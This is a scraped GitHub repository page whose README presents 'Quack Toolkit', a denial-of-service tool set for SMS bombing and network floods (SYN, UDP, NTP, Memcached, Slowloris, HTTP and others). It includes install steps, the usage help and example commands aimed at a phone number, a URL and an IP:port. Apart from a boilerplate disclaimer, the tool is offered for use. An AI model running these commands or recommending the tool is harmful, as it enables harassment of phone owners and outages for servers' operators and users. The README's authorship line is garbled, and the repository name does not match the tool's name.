Skip to content

DarkKnightSafe/SMS-or-Network-Jam-attack-By---Dark_knight

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Quack Toolkit

quack


About Quack Toolkit

Quack Toolkit is a set of tools to provide denial 
of service attacks. Quack Toolkit includes SMS attack 
tool, HTTP attack tool and many other attack tools.

Getting started

Quack installation

cd quack

chmod +x install.sh

./install.sh

Quack uninstallation

cd quack

chmod +x uninstall.sh

./uninstall.sh


Quack Toolkit execution

quack -h

usage: quack [-h] [--target <IP:port/URL/phone>]
             [--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
             [--timeout <timeout>] [--threads <threads>] [-u] [--version]

optional arguments:
  -h, --help            show this help message and exit
  --target <IP:port/URL/phone>
                        Target IP:port, URL or phone.
  --tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
                        Attack tool.
  --timeout <timeout>   Timeout in secounds.
  --threads <threads>   Threads count.
  -u, --update          Update Quack Toolkit.
  --version             Show Quack Toolkit version.

Quack Toolkit examples

Example of the SMS attack

quack --tool SMS --target 15554443333 --timeout 10 --threads 10

Example of the HTTP attack

quack --tool HTTP --target http://example.com/ --timeout 10 --threads 10

Example of the TCP attack

quack --tool TCP --target 192.168.1.100:80 --timeout 10 --threads 10


Quack Toolkit disclaimer

Usage of the Quack Toolkit for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Quack Toolkit license

By :- Dark_Knight this work very well

About

SMS or Network Jam attack By:- Dark_knight

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published